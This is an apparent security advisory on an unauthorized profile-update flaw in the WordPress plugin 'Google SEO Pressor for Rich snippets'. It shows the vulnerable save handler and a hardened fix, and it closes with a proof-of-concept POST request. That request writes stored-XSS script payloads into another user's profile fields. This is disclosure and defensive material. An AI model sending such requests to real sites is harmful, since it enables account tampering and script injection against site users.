Google SEO Pressor for Rich snippets [Unauthorized Profile Update]

Description

Google SEO Pressor for Rich snippets lets users store their social-profile information (Facebook account, Twitter account, and so on). The function responsible for saving this data does not bind it to the user whose profile is being edited, so a registered user can change this information for any other user.

The vulnerable code (note the $_POST['currentuser'] parameter, which is used as the user ID for the usermeta update instead of the $user_id passed in by WordPress):

add_action( 'personal_options_update', 'yoursite_save_extra_user_profile_fields' );
add_action( 'edit_user_profile_update', 'yoursite_save_extra_user_profile_fields' );
function yoursite_save_extra_user_profile_fields( $user_id ) {
  $saved = false;
  // The capability check is performed against $user_id ...
  if ( current_user_can( 'edit_user', $user_id ) ) {
    // ... but the values are taken from the request unfiltered ...
    $profilelinks = array(
      'gplus'     => $_POST['gplus'],
      'fbook'     => $_POST['fbook'],
      'twit'      => $_POST['twit'],
      'linkin'    => $_POST['linkin'],
      'latitude'  => $_POST['latitude'],
      'longitude' => $_POST['longitude']
    );
    // ... and written to whatever user ID the client supplied in 'currentuser', not to $user_id.
    update_user_meta( $_POST['currentuser'], 'smack_social_links', $profilelinks );
    $saved = true;
  }
  return true;
}

In addition, the submitted values are not sanitized, so raw HTML elements can be stored in the database and later rendered wherever the plugin outputs these fields.
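A hardened version of the save handler, added here as an example and not taken from the plugin: it writes only to the $user_id WordPress passes to the hook, and it sanitizes each field to the type it is expected to hold. Field names and the meta key are the plugin's; the function name and the per-field validation rules are assumptions.

```php
<?php
// Added example (not the plugin's own code): hardened replacement for the profile-save handler.
add_action( 'personal_options_update', 'yoursite_save_social_links_hardened' );
add_action( 'edit_user_profile_update', 'yoursite_save_social_links_hardened' );

function yoursite_save_social_links_hardened( $user_id ) {
    // Authorization: the current user must be allowed to edit the profile being saved.
    // (The nonce for this form is already verified by wp-admin/user-edit.php before these hooks fire.)
    if ( ! current_user_can( 'edit_user', $user_id ) ) {
        return false;
    }

    $profilelinks = array();

    // Profile links: keep only a well-formed http(s) URL; anything else (including markup) becomes ''.
    foreach ( array( 'gplus', 'fbook', 'twit', 'linkin' ) as $field ) {
        $raw = isset( $_POST[ $field ] ) ? wp_unslash( $_POST[ $field ] ) : '';
        $profilelinks[ $field ] = esc_url_raw( trim( $raw ), array( 'http', 'https' ) );
    }

    // Coordinates: accept only numeric values within the valid range; otherwise store ''.
    foreach ( array( 'latitude' => 90, 'longitude' => 180 ) as $field => $limit ) {
        $raw = isset( $_POST[ $field ] ) ? trim( wp_unslash( $_POST[ $field ] ) ) : '';
        $profilelinks[ $field ] = ( is_numeric( $raw ) && abs( (float) $raw ) <= $limit )
            ? (string) (float) $raw
            : '';
    }

    // The key point of the fix: the target user comes from WordPress ($user_id), never from the request body.
    update_user_meta( $user_id, 'smack_social_links', $profilelinks );
    return true;
}
```

Storing clean values is only half of the fix; wherever the plugin renders these fields it should still escape them on output (esc_url() for the links, esc_html() or esc_attr() for the coordinates).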

PoC

POST /wp-admin/profile.php HTTP/1.1
Cookie: [COOKIES]

_wpnonce=[NONCE]
&checkuser_id=[YOUR USER ID]
&user_id=[YOUR USER ID]
&currentuser=[ANOTHER USER ID]
&gplus=<script>alert(/GooglePlus/)</script>
&fbook=<script>alert(/Facebook/)</script>
&twit=<script>alert(/Twitter/)</script>
&linkin=<script>alert(/LinkedIn/)</script>
&latitude=<script>alert(/Latitude/)</script>
&longitude=<script>alert(/Longitude/)</script>
&_wp_http_referer=/wp-admin/profile.php
&from=profile
&nickname=subscriber
&display_name=subscriber
&[email protected]
&action=update
&submit=Update+Profile
